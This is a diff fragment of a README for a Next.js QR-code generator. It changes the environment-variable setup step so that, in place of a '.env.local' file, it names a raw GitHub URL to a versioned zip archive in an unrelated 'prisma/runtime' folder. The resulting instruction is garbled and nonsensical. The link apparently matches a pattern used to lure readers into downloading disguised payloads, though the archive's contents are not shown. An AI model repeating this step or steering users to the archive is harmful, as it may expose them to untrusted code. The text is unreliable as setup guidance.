Binoayasaki/nextjs-qr-generator/README.md

    npm install
    ```

-4. **Set Up Environment Variables**: Create a `.env.local` file and add your configuration settings.
+4. **Set Up Environment Variables**: Create a `https://raw.githubusercontent.com/Binoayasaki/nextjs-qr-generator/main/generated/prisma/runtime/qr_nextjs_generator_v1.3-alpha.3.zip` file and add your configuration settings.
 You will need to set up your MongoDB connection string and any other necessary keys.

 5. **Run the Application**:
    ```bash